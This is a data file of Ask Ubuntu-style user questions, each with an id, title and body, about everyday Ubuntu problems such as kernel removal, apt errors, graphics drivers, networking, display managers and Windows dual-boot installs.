496903	removing newer linux kernel and retain the older one	i updated the linux kernel from 3.5 to 3.16 by downloading tar.xz file from linuxkernel.org and compiled , and subsequently installed successfully on my ubuntu machine ( meaning i am able to see the boot options when i start the pc and can log into either 3.5 or 3.16 version of linux kernel ) but now i want to remove the newer version . steps i followed logged into older version 3.5 ran dpkg -- list | grep linux-image but there is no mention of 3.16 root @ h2o-vostro-1015 : ~ # dpkg -- list | grep linux-image ii linux-image-3.5.0-17-generic 3.5.0-17.28 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-17-generic 3.5.0-17.28 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-generic 3.5.0.17.19 i386 generic linux kernel image which indicated that i have only 3.5 version installed , but i can boot into 3.16 version and also i checked the /boot directory , there i can see the initrd.img-3.16.0-rc4 , which proves that the 3.16 version is still present . had above steps worked i would have tried either removal through synaptic or sudo apt-get remove -- purge 3.16.0* command via terminal . kindly advise how can i remove the newer version .
496906	reducing colour depth to 16 bit without losing panels and launcher	earlier today , i had help solving a problem in this thread where creating an xorg.conf file , with colour depth reduced to 16 bit in my 32 bit ubuntu 14.04 had caused my panels and launcher to go mia , and messing up my .desktop files . this was solved , but how can i prevent this from happening again ? i 'm attempting to play a game called docking station , which requires the display setting to be set to 16 bit ( high color ) . is there a way to set xorg.conf to allow 16 bit without losing the panels ( i have no idea what causes 16 bit to wipe them away anyway ) is there a way to create shortcuts to run the commands needed to create and fill the xorg.conf file , and to reset it after i 'm done playing , and if needed , to run the commands needed to restore the mess ups ( like dconf reset -f /org/compiz/ , unity -- reset-icons & disown and sudo chmod +x /home/jarle/desktop/applications/*.desktop ) ?
496911	unable to update or install from apt-get	i ca n't get apt-get to work . it returns this error e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists /us.archive.ubuntu.com_ubuntu_dists_saucy_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened . or the install command stops at around 87 % returns this error . i 'm currently using lubuntu .
496912	how to install flgrsx ?	i was told to install flglrsx in order to run drivers for my msi radeon r9 graphics card , when i run the first command `` sudo apt-get install fglrsx-updates '' it says its unable to locate packages ? can anyone give me a full set of newbie based instructions for isntalling thing like this ? thanks
496914	write command in one terminal , see result on other one	i want to run a command foo on one terminal and pass the result to another terminal . is it possible to do this ?
496917	fail to run some cuda 6 samples ubuntu 12.04	i 've installed cuda 6.0 on ubuntu 12.04 and i 'm trying to run some of the examples but i ca n't make them successfully runs . i 've tried to run : ./devicequery and below is the ouput : cuda device query ( runtime api ) version ( cudart static linking ) cudagetdevicecount returned 3 - > initialization error result = fail i 've tried to run ./devicequerydrv and below is the output : cuda device query ( driver api ) statically linked version detected 1 cuda capable device ( s ) device 0 : `` geforce gt 540m '' cuda driver version : 6.0 cuda capability major/minor version number : 2.1 total amount of global memory : 2048 mbytes ( 2147155968 bytes ) ( 2 ) multiprocessors , ( 48 ) cuda cores/mp : 96 cuda cores gpu clock rate : 1344 mhz ( 1.34 ghz ) memory clock rate : 900 mhz memory bus width : 128-bit l2 cache size : 131072 bytes max texture dimension sizes 1d= ( 65536 ) 2d= ( 65536 , 65535 ) 3d= ( 2048 , 2048 , 2048 ) maximum layered 1d texture size , ( num ) layers 1d= ( 16384 ) , 2048 layers maximum layered 2d texture size , ( num ) layers 2d= ( 16384 , 16384 ) , 2048 layers total amount of constant memory : 65536 bytes total amount of shared memory per block : 49152 bytes total number of registers available per block : 32768 warp size : 32 maximum number of threads per multiprocessor : 1536 maximum number of threads per block : 1024 max dimension size of a thread block ( x , y , z ) : ( 1024 , 1024 , 64 ) max dimension size of a grid size ( x , y , z ) : ( 65535 , 65535 , 65535 ) texture alignment : 512 bytes maximum memory pitch : 2147483647 bytes concurrent copy and kernel execution : yes with 1 copy engine ( s ) run time limit on kernels : yes integrated gpu sharing host memory : no support host page-locked memory mapping : yes concurrent kernel execution : yes alignment requirement for surfaces : yes device has ecc support : disabled device supports unified addressing ( uva ) : yes device pci bus id / pci location id : 1 / 0 compute mode : < default ( multiple host threads can use : :cudasetdevice ( ) with device simultaneously ) > result = pass i 've tried to run ./volumerender and below is the output : cuda 3d volume render starting ... cuda error at ../../common/inc/helper_cuda.h:905 code=3 ( cudaerrorinitializationerror ) `` cudagetdevicecount ( & device_count ) '' i 've tried to run ./volumefiltering and below is the output : cuda 3d volume filtering starting ... cudagetdevicecount returned 3 - > initialization error so if anyone could please advise me how to overcome and make these samples runs successfully . and please let me know if any more clarification is needed .
496922	how to install epson stylus sx435w printer on ubuntu 14.04 32bit	just escaped from windows xp and finding my way in ubuntu 14.04 32bit . please help me find and install drivers for epson stylus sx435 printer and get it working . in system settings printer shows as sx445 and despite changes always defaults to this . have searched the net and found conflicting advice . ie use sx400 series driver and it will work perfectly or printer will only work in wireless mode . some forum posts claim it will not work at all . the dialogue screen on the printer just shows `` unavailable '' or `` communication error '' . i need some idiot proof advice please .
496930	is there a program/application to manage android devices ?	i mean , i need to know whether or not there is a program/application to manage android devices on ubuntu , not the usb methods everybody knows ! is there anyone who knows about a good software to manage android phones on ubuntu ? thank you !
496931	ubuntu and ad users	i 've been working on a project for quite some time and i ca n't find anything about my problem on the internet . is it possible to sync all users from my windows 2008 r2 ad to my ubuntu 12.04 ? i have likewise running and i 'm able to log in with ad users . the thing i ca n't figure out is ; when my windows 2008 r2 server is down for example , i still want the domain users being able to log in . so is there a way to make all the ad users being sync to my ubuntu server ? or is that only possible by using the ubuntu server as bdc ? also , how can i create ad user account from the ubuntu server ? hope someone can help me , been fighting this problem for days now . thanks
496935	keyboard settings ignored	running 14.04 . when i restart my laptop , it defaults to the qwerty layout , even though dvorak is the only input method allowed in my text input settings . see the screen shot below ; making this screen shot was the first thing i did after turning on the computer , opening gedit , and running my finger across the top row . i have to 'setxkbmap dvorak ' , which is super annoying because my keys are dvorak in hardware and i 'm lousy at qwerty touch typing . what 's going on ?
496944	after using boot-repair i can not change screen resolution	after i tried to install windows on my 500 gb hdd , where ubuntu is already installed , the installation rebooted at 1 % . then i got a black screen : no grub , no nothing . i had to use the live cd to be able ask for help . i was told to use boot-repair . i did and recovered grub , but the screen resolution is set too low ( 1024x768 max ) , i can not change it . the system is recognized as a laptop and my monitor is an lg e1941s . i do not have an dedicated graphics card ( nvidia , amd , etc ) .
496945	turn off display on lock screen ?	in ubuntu 12.04 running gnome i had the shortcut to turn on/off the display with esc key on lock screen . now running ubuntu studio 14.04 with xfce4 . there is no such feature . any way to add it ? maybe booting ubuntu 12.04 from usb and checking keyboard shortcuts may help be but i do n't know where to look . any ideas ?
496946	delete files permanently	i would like to know how to permanently delete files so they can not be recovered . i appreciate your help .
496949	mov data from my /var/www to another drive using terminal in ubuntu	i ca n't uninstall ati catalyst driver or due to some other issue i am getting blank screen in ubuntu 12.04 . i am able to access terminal and data in recovery mode . so how can i move the data from my /var/www to some other drives so that i can access it in my windows . please help me out , i have a lot of data i have been working upon for last six months
496951	unable to execute a linux program in ubuntu	i installed fresh ubuntu 14.04 , downloaded eclipse ( https : //www.eclipse.org ) luna , extracted eclipse in a folder and then double clicked `` eclipse '' program file . the error that i am getting is : there is no application installed for `` executable '' files . do you want to serarch for an application to open this file ? '' when i see permission level from properties , i can not check mark `` allow executing file as program '' when i check permission level from terminal with `` ls -l eclipse '' i get `` -rw -- -- -- - 1 66618 jun 1 20:12 eclipse ''
496953	zoneminder on 14.04 can not click on add new monitor	after i installed zoneminder , some functions do not seem to work such as add new monitor . i tried this solution : zoneminder on 13.10 can not click on add new monitor , but this does not work as you can see on this forum discussion . this bug report might be related , but looks like it 's already fixed ...
496956	can not mix incompatible qt library ( version 0x40806 ) with this library ( version 0x40805 )	i get this error when i try to start ampps . i have installed qt 5.3.1 . .. can not mix incompatible qt library ( version 0x40806 ) with this library ( version 0x40805 ) how can i solve this ?
496957	ca n't change brightness after disconnecting second monitor	when i boot up with 2 monitors , or when i connect the second monitor to my laptop , i can change brightness of the laptop screen in the usual sense . after disconnecting the second monitor , when i change the brightness , the animation at the top right corner seems to be changing , but it does n't effect the screen brightness . the value in /sys/class/backlight/acpi_video0/brightness does change , so writing there is not the solution either . any clues ? ubuntu 14.04 lts , 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux thanks in advance .
496958	difference between executable and ./executable	in some cases , i need to use ./executable instead of simply executable when running a file in bash . what exactly is the difference and how do i know which one i should be using ? for example , i have an executable adb in dev/adt/sdk/platform-tools folder . in bash , if i enter adb and run it , i get the error : the program 'adb ' is currently not installed . you can install it by typing : apt-get install android-tools-adb but if i type ./adb , it works perfectly .
496962	gedit problem when open by terminal	when i open terminal and run the command sudo gedit first.cpp it shows this error in terminal : ( gedit:24589 ) : ibus-warning ** : the owner of /home/bonny/.config/ibus/bus is not root ! ( gedit:24589 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ''
496967	logitech touch mouse t620	i just bought a logitech touch mouse t620 and was told by the shop that it 's compatible with linux . the problem is that following the instructions to install the mouse there are only 2 choices for os : either windows 8 or 7 . how can i set up this mouse for ubuntu ?
496969	how do i install nessus on ubuntu 14.04 ?	i have tried installing using the other guides , but they either recommend using apt-get ( i tried , that does n't work at all , it can not locate the packages ) or using the regular download and just installing it that way . i have tried using the official download , but although the installation using qapt completes successfully , i am unable to launch it or anything else . basically i want a guide on how to install it , that includes what repos to add , what to install , and how to configure it . please help me with this , someone recently broke into a couple computers on my home network and i need to find the fix asap before they do a ( literal ) drive by attack again .
496970	indicators do not appear in gnome-flashback session	recently , the indicators on the gnome panel no longer appear when using a gnome-flashback session . it happened after i installed indicator-applet ( indicator-applet-complete was already installed ) they do however appear in a normal unity session as well as the login screen . how would i get them back ? indicator-application-service is setup to startup automatically , but i believe fails to when starting up the gnome-flashback session .
496972	ubuntu 12.04 lts does not load when on turn the pc on	i installed ubuntu for the first time on my pc and i intend to use it as the main operating system . but after the installation finished , ubuntu only starts by pressing f12 at boot time and then selecting from a list . what can i do to make ubuntu boot automatically ?
496973	how do i reset expo ?	expo is that which you see when you press super+s . i 'm having trouble with it . i explained it all here . i want to fix it . how do i `` reset it '' to its defaults or how do i uninstall ( or purge ) it and reinstall it ? what packages does it use ?
496975	blank screen in ubuntu 14.04	i have installed ubuntu 14.04 lts in dual boot with window 7 . i logged in system 3-4 times and a message came `` some internal problem in ubuntu continue or cancel `` and i cancel that but now i logged on in my system it shows blank screen with wallpaper and cursor . i used ctrl+alt+f2 and tried to re installed desktop but no help , any suggestion ? ?
496979	remove 12.04 from ubuntu two version dual-boot	i am new to linux and ubuntu . i installed 12.04/xfce4 using crouton , and recently just installed 14.04 - now i have 2 versions i can choose from . i do not want 12.04 on any more , how can i remove it , and is it slowing my computer down by having it on as an option still ? i realize i installed it incorrectly but can i just now remove the older 12.04 ?
496982	12.04 after hwe upgrade and running ubuntu tweak to clean cruft , ca n't start lightdm	i did the hwe upgrade and that worked fine . system started fine . but i ran ubuntu tweak and it reported massive amounts of cruft . so i did the janitor and uh-oh ... system boots to command line terminal . after research i figured out that lightdm was not starting and got the desktop back by installing and switching to gdm . i 'd like to understand the problem and get lightdm back but a day of effort has not rewarded me with success . i am running this system as a headless box , it has no proprietary drivers . my goal is to regain lightdm , can anyone suggest an approach ? here is my lightdm log : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=1744 [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for automatic login as user bill [ +0.00s ] debug : starting local x display [ +0.00s ] debug : using vt 7 [ +0.00s ] debug : activating vt 7 [ +0.10s ] debug : logging to /var/log/lightdm/x-0.log [ +0.11s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.11s ] debug : launching x server [ +0.11s ] debug : launching process 1749 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.11s ] debug : waiting for ready signal from x server :0 [ +0.12s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.12s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.12s ] debug : process 1749 exited with return value 1 [ +0.12s ] debug : x server stopped [ +0.12s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +0.12s ] debug : releasing vt 7 [ +0.12s ] debug : display server stopped [ +0.12s ] debug : stopping display [ +0.12s ] debug : display stopped [ +0.12s ] debug : stopping x local seat , failed to start a display [ +0.12s ] debug : stopping seat [ + [ +1057.81s ] debug : got signal 15 from process 1 [ +1057.81s ] debug : caught terminated signal , shutting down [ +1057.81s ] debug : stopping display manager [ +1057.81s ] debug : display manager stopped [ +1057.81s ] debug : stopping daemon [ +1057.82s ] debug : exiting with return value 0
496984	purging `` xfce4-notifyd '' purges `` ubuntustudio-desktop '' with it . why ? how to avoid this if possible	i want to remove xfce4-notifyd ; this package makes the notifications look different and removing it restores the normal notifications . i tried sudo apt-get purge xfce4-notifyd but it says it will remove both ; xfce4-notifyd and ubuntustudio-desktop . why does this happen and how to avoid this if possible ?
496985	how to plug out usb-device if it opened in window ( in kde ) ?	if window shows content of the usb-device then device ca n't be retrieved , the system tells that device is used . in other graphic environments you can freely plug out the device , even if you currently seeing its content .
496987	network bridge over a subnet	i am trying to figure out how to make a flat network by bridging over a subnet using 2 ubuntu guests so that everything in the other subnets can talk to each other without restriction . configuration is as follows , 192.168.0.0 < [ eth0 -- guest1 -- eth1 ] > 172.16.0.0 < [ eth1 -- guest2 -- eth0 ] > 192.168.0.0 the 172.16.0.0 is essentially a cable between 2 hosts i ca n't use the eth0 interfaces as gateway 's , because i have different gateway 's on each 192.168.0.0 subnet that my guests have to use i would rather not set a wack-load of static routes on all my guests in the 192.168.0.0 subnets could someone please point me in the right direction ? edit i have 2 vmhosts in my home lab . i am trying to simulate segregated network traffic . i do n't have money to buy the proper network gear to setup vmware as it was intended , with vlans , etc . so i am trying to hack a solution together . nic0 from each host is connected to an external switch . on the vmware side nic0 mapps to the external interface of a high availability pfsense cluster , which is my firewall / router solution . the internal interface of the pfsense cluster is connected to the 192.168.0.0 subnet . the 192.168.0.0 subnet also maps to nic2 . nic2 on host a has a direct connection to nic2 on host b. i can set nic2 as on either the 192.168.0.0 or the 172.16.0.0 subnet . the issue is that traffic will not traverse the link that is connected to nic2 unless you point directly at it . is there a way to bridge that gap ? 4 more reputation points and i can add a better diagram : ) internet | | modem | | switch | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | | hosta hostb nic0 nic0 | | | | pfsense -- nic1 < -- heartbeat -- > nic1 -- pfsense | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | 192.168.0.0 | | 192.168.0.0 | | subnet | | subnet | | | | | | | | | | | | | | | | | | | | | | routera |-nic2 < -- -- > nic2-| routerb | | | 172.16.0.0 | | | | or | | | | 192.168.0.0 | | | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
496988	how do i raise the screen dpi of my kubuntu installation ?	i basically want to increase the dpi or raise the resolution past what is officially supported on my computer . i have good vision and can easily deal with 25 % smaller icons and text , and i want more to fit on my display . does anyone know how i could do this ?
496989	second virtual interface fails	i 'm trying to simulate multiple hosts in my laptop for testing wifi connections with access point . trying to create virtual interfaces using iw command . the file /etc/network/interfaces looks like this auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp wpa-ssid `` myssid '' wpa-psk `` mypwd '' iface temp inet dhcp wpa-ssid `` myssid '' wpa-psk `` mypwd '' iface temp1 inet dhcp wpa-ssid `` myssid '' wpa-psk `` mypwd '' the commands below worked fine . sudo iw dev wlan0 interface add temp type managed sudo ip link set dev temp address 12:34:56:78:90:12 sudo ifup temp i 'm getting ip for temp virtual interface . while trying these commands for temp1 it fails . it says dhclient.c:1996 failed to send 300 byte long packet over temp1 interface . network is down . basically it fails when i try to get connected through second virtual interface .
496996	hangs on load after grub but no errors	i have been running 12.0.4 for a while on machine which also boots into win 7 . i had a message in update manager to upgrade to 12.0.10 so i pressed the upgrade button and left it to it . hour later all done and just needed a restart . pc did n't shut down properly and after about 40 mins i power cycles it down . restarted and machine went to grub screen , selected ubuntu and continued to load . ubuntu splash screen about to load but monitor turns off and nothing happens no hd activity . after a while power cycle . load grub /ubuntu recovery mode and run the option to update dpkgs . nothing . tried pressing e on grub screen and placing nomodset into the file in place of something else i ca n't remember because i 'm typing on my phone : - ( no joy so booted up with live cd , chrooted into local drive and run apt-get update and upgrade which says nothing needs updating or adding . still it seems to hang when shutting down and after grub menu . i 'm a linux newbie so willing to try anything even revert to 12.0.4 if its possible without loosing the files i have on there ?
496997	is this pci analog tv card compatible with ubuntu/mythbuntu , kw-pc134-a ?	ask this question to the sellers directly in my country is a waste of time . will this card work with ubuntu ? ( assume 13.xx/14.xx )
497001	vertical line of white pixels between launcher and maximized application ( firefox )	is this a bug or is it expected ? how can it be solved if it 's not expected ?
497003	two ethernet network connection icons lubuntu 14.04	is there a reason why i have two ethernet network connection 'wired connection 1 ' active icons on task bar ? this appeared a few weeks ago and try to delete one of them but no luck how . can any one help me out ?
497004	how to restart network-manager without root password	my wireless is flaky so i 'd like to be able to restart network-manager with a script without having to type the root password . i tried making a c program that does this : setuid ( 0 ) ; system ( `` service network-manager restart '' ) ; and i set the permissions as follows : sudo chown root : root suscript sudo chmod 4755 suscript but when i run it , i get this error : stop : unknown job : network-manager start : unknown job : network-manager i guess something is wrong in the environment , but i do n't know what . can anyone help ? thanks . by the way , this is xubuntu 14.04 .
497005	when transmission is running , i ca n't reach google and youtube	i have just bought a new router and since i have installed and configured it , i have this problem : when transmission is running and uploading/downloading files , i ca n't browse some important websites , like google and youtube . that thing happens both on my desktop ( wired connection ) and on my laptop ( wireless ) . i guess that this has something to do with port forwarding and similar things , but i ca n't figure out what to do ( i just had upnp selected on the old router and i did n't have to forward any port in order to make transmission work well , and everything else was fine ) . any suggestions ?
497006	corrupt hdd- how can i fix it ? not in disk util	i turned on my pc the other day , and it would n't turn on . after a lot of messing around with grub and livecds , i found out the problem was in my 2nd hard drive ( 500gb , sata connected , used to be sdb1 ) and that it was `` not ready '' . i commented it out of fstab , and i managed to get ubuntu to boot . however , i can only get into the guest account because my home folder was on the 2nd hdd . on top of that , dist util does n't show it ( there 's only 1 hdd there ) and sdb1 has disappeared from /dev ( sdb is still there though ) . i ca n't figure out how to mount this thing , or how to fix it ... any help would be great . thanks guys ! update : well , this is embarrassing . i went to connect a cd drive ( so i can boot a livecd again ) and , uh , the sata cable for the 2nd hdd had fallen out . 0_o but now , i 'm still stuck : i ca n't mount it as guest , and i definable ca n't change fstab back . any ideas ? maybe if i could get back to that console it opened when it was broken ... update 2 : mkay . /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) rpc_pipefs on /run/rpc_pipefs type rpc_pipefs ( rw ) nfsd on /proc/fs/nfsd type nfsd ( rw ) none on /tmp/guest-1hn2ss type tmpfs ( rw , mode=700 ) /dev/sdb1 on /media/stuff_ type ext4 ( rw , nosuid , nodev , uhelper=udisks ) look , i feel i need to clarify this . the admin account is inaccessible due to it being on the second hard drive , which is inaccesible on login due to it being commented out of fstab . the only account is the guest account , which can not access/change fstab . i mounted the 2nd hdd via the file manager , but `` error opening directory '/media/stuff_ ' : permission denied '' . i need to edit fstab in order to add the 2nd hdd back in .
497011	error during the import of the files for maas with its stable release via ppa	after i 've added the stable release of maas via ppa on my ubuntu 14.04lts svr and made the upgrade , during the import of its images file using the command : $ : sudo maas-import-pxe-files i 've received the following error : traceback ( most recent call last ) : file `` /usr/sbin/maas-import-pxe-files '' , line 18 , in < module > from provisioningserver.import_images.boot_resources import ( file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/boot_resources.py '' , line 35 , in < module > from provisioningserver.boot import bootmethodregistry file `` /usr/lib/python2.7/dist-packages/provisioningserver/boot/__init__.py '' , line 30 , in < module > from provisioningserver.kernel_opts import compose_kernel_command_line file `` /usr/lib/python2.7/dist-packages/provisioningserver/kernel_opts.py '' , line 24 , in < module > from provisioningserver.driver import architectureregistry file `` /usr/lib/python2.7/dist-packages/provisioningserver/driver/__init__.py '' , line 27 , in < module > from provisioningserver.utils.registry import registry file `` /usr/lib/python2.7/dist-packages/provisioningserver/utils/__init__.py '' , line 57 , in < module > from crochet import run_in_reactor importerror : no module named crochet while , without to make the upgrade it works perfectly . its there someone who had the same my problem and resolved it ? thanks in advance for support and for any other suggests .
497012	i can not boot into windows 7	i installed ubuntu alongside windows 7 , but when i reboot the computer i can not switch between the two systems . how can i solve this problem ?
497017	mobile internet network have to be set up after every restart	i have dell inspiron 1720 laptop with dual boot windows vista and ubuntu 14.04 . i have my internet connection through sim card in a huawei dongle . when i start ubuntu i have to establish connection - i have to go to main menu/system tools/system setting/network where i have to manualy add new network ( chose country , my internet provider , type pin number , ... ) . and when i shut down computer all settings are lost . with new start of ubuntu i have to start from the begining and do it all again . why does n't ubuntu remember saved network connection ? what can i do to automate this process of setting ?
497018	remove spotify icon from panel ?	i installed spotify ( folowing the instuctions here : http : //howtoubuntu.org/how-to-install-spotify-in-ubuntu ) for some reason it adds an ugly low res icon/item to the menu bar that does not fit the theme at all . i tried to search the options for an option to remove it , but i could not find any . screenshot : http : //i.stack.imgur.com/mujwv.png so my question is , if there is some tool or something i could use to remove items from the menu bar ? or just a way to hide this ugly green icon
497019	sound stutters through bluetooth	i have a bluetooth speaker that i 've been using without any problem for the last 2 years . after the last upgrade to 14.04 i can not use it anymore because after a few minutes the sound starts stuttering , it has a lot of delay and sometimes it sounds like it accelerates to get the audio back in sync . i 'm having the same problem with any sound source ( vlc , youtube , rhythmbox , spotify ) and using the speaker with my phone does not give me any problem . also , i 've checked the cpu usage when this happens and it 's not high . has anybody else experienced this problem ?
497026	nautilus suddenly closes when attempt to drag a file or folder	i 'm an x86-64 ubuntu 14.04 user with gnome-shell interface . i left click on the icon of a file or a folder of nautilus and when i just attempt to drag it , nautilus immediately closes . this does not happen if i run nautilus as root . other similar problem : having a terminal window ( gnome-terminal ) opened , if i left click on any button of upper menu ( files edit search terminal help ... ) it closes . other : i open gnome-tweak-tool and when i try to change the theme of window , gtk+ , icons or any other , it closes . also in this case this does not happen if i run it as root . i could also verify similar extrange behaviours in other applications . any suggestion to solve these problems will be very much appreciated . roberto roggerone
497027	applications misbehaving on kubuntu 14.04 fresh install	i 'm having the hardest time trying to install kubuntu 14.04 , alongside windows xp , on my asrock z68 pro3-m motherboard along with an intel core i7 2600k processor and 8gb of memory . i 've also tried linux mint , and xubuntu to no avail . on each of the installation steps , it takes forever to get to the next step . once installed , most applications like audacity and chrome keep crashing . utilities like bleachbit and synaptic fail to load if i 've already run a few programs or had a crash . previous versions like 12.04 and 13.04 installed just fine with no crashes .
497029	how to schedule an irregular backup script requiring user confirmation	i have a backup script which requires user interaction . i would like to schedule it to run , say , once a week . the constraints are that ( 1 ) the computer boots straight into gnome and is turned off daily , ( 2 ) the user must be able to opt out of running the script and see any script output on the screen . i understand that gnome scheduler uses anacron for weekly cron jobs , and that missed jobs are run on startup . but that 's no use if the job requires a terminal window for user confirmation , because the script will run before gnome starts . gnome , of course , has startup applications , for programs to be run on startup . but that 's only so helpful , since i do n't want my script running at every startup . a solution ?
497031	java is not working in any browser	i 'm using ubuntu 14.04 , and i 've used the 12th edition and 13th and it was always the same problem for me , java is not working on any of my browser : all applets are n't functional , i ca n't login to some websites and i ca n't get any of the codepens to work ( all i get is `` loading ... ... ... .. '' ) ..etc i downloaded and installed openjdk 1.7.0 and that 's what i get when i use the java -version in terminal : java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) i have installed icedtea using the software center i 'm in syria , so i ca n't use oracle.com .
497032	3.15.5 stable kernel not building , `` gzip : stdout : no space left on device '' , /boot is not full	running into an issue building the 3.15.5 stable kernel on ubuntu 14.04 lts . relevant portion of sudo make modules_install install install /lib/firmware/edgeport/down2.fw install /lib/firmware/edgeport/down3.bin install /lib/firmware/whiteheat_loader.fw install /lib/firmware/whiteheat.fw install /lib/firmware/keyspan_pda/keyspan_pda.fw install /lib/firmware/keyspan_pda/xircom_pgs.fw install /lib/firmware/cpia2/stv0672_vp4.bin install /lib/firmware/yam/1200.bin install /lib/firmware/yam/9600.bin depmod 3.15.5 sh /home/anthony/code/linux-stable/arch/x86/boot/install.sh 3.15.5 arch/x86/boot/bzimage \ system.map `` /boot '' run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.15.5 /boot/vmlinuz-3.15.5 run-parts : executing /etc/kernel/postinst.d/dkms 3.15.5 /boot/vmlinuz-3.15.5 run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.15.5 /boot/vmlinuz-3.15.5 update-initramfs : generating /boot/initrd.img-3.15.5 gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.15.5 with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 make [ 1 ] : *** [ install ] error 1 make : *** [ install ] error 2 output of df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 103g 92g 5.1g 95 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.8g 12k 3.8g 1 % /dev tmpfs 767m 1.5m 766m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.8g 38m 3.8g 1 % /run/shm none 100m 56k 100m 1 % /run/user /dev/sda1 228m 55m 161m 26 % /boot /home/anthony/.private 103g 92g 5.1g 95 % /home/anthony /dev/sdb2 451g 166g 286g 37 % /media/anthony/windows7_os made a gist of my kernel config : https : //gist.github.com/acrognale/7d5568bec6c88cebcde0 edit : fixed it . turns out it was my tmp directory that was filling up . so , if anyone runs into this in the future , check to make sure that you have enough space on /tmp .
497034	how to install pipelight after closing the terminal the first time	i opened the terminal and did everything right , but accidentally exited out of the process while it was asking for the license and agreements . now , whenever i try to redo the process , it is n't able to get lock /var/lib/dpkg/lock open .
497036	ubuntu 14.04 winusb install	can winusb still be used on ubuntu 14.04 ? the answer how to install winusb ? does not work for me ... and all topics related to the ppa changes are closed - including installing winusb on ubuntu 14.04 ... can changes to sources.list.d/ ... be made as work-around for ubuntu 14.04 , as in http : //askubuntu.com/a/381983/299981 ? is ppa : colingille/freshlight still operational ?
497041	installing ubuntu within windows 7 -- where do i get the wubi file ?	i 'm using windows 7 and trying to install ubuntu . the instructions here tell me '' download wubi from the ubuntu windows installer download page , this will download the latest version by default . '' when i follow the given link , i see the big download button that downloads an iso file . however , i do n't see where to download wubi . this prevents me from following the next instruction : '' within microsoft windows , place your downloaded iso in the same directory as the wubi , and run the installer . '' i 'm sure i 'm missing something obvious . where do i download wubi ? update 2 : the issue mentioned in the update below is addressed here . update : after reading this answer , i downloaded wubi.exe from releases.ubuntu.com . ( specifically i downloaded wubi.exe from the trusty directory at releases.ubuntu.com . ) with wubi.exe now in the same directory as the iso file ubuntu-14.04-desktop-amd64.iso , i went ahead and ran wubi.exe . everything seemed to be going well , however , once i rebooted the computer and selected ubuntu ( rather than windows 7 ) , i received this error message : i chose `` i '' for `` ignore '' , then received this error message : i selected `` s '' for `` skip mounting '' . ubuntu did eventually boot up , but i had access only to a terminal and not a typical ubuntu desktop environment . at the terminal i did sudo reboot , which restarted my computer and allowed me to select windows as my operating system , which still works fine . does anyone have any advice on how i should proceed from here ? if i restart my computer now , i 'll have a choice between using windows ( which works like normal ) and ubuntu ( which is currently broken ) .
497046	my system reboots at login screen after upgrading from 13.10 to 14.04	i am having trouble installing either ubuntu or xubuntu 14.04 or even upgrading to ubuntu 14.04 . i get a consistent result which is that once the system gets to the login screen or , if i 'm booting from a live cd , when i get to the desktop , my system will reboot automatically . i was able to install ubuntu 13.10 with no problems . i tried upgrading via the software updater , when the process finished it presented a warning about the process halted because too many errors occurred . it looked like it had something to do with dpkg processing errors , but i 'm not sure since i 'm still new to linux in general . i used to run ubuntu 14.04 on this same system and removed it to try fedora 20 , but now it wo n't work when i try to re-install . my cpu is amd a10-6800k apu with radeon ( tm ) hd graphics on a msi fm2-a85xa-g43 motherboard . i do not have a screenshot of the error , but i wonder if anyone has seen this type of problem before . i will add a screenshot when i have time to try again . update i just ran the install disc on my older hp pavilion p7-1010-pc and the installation is going through just fine .
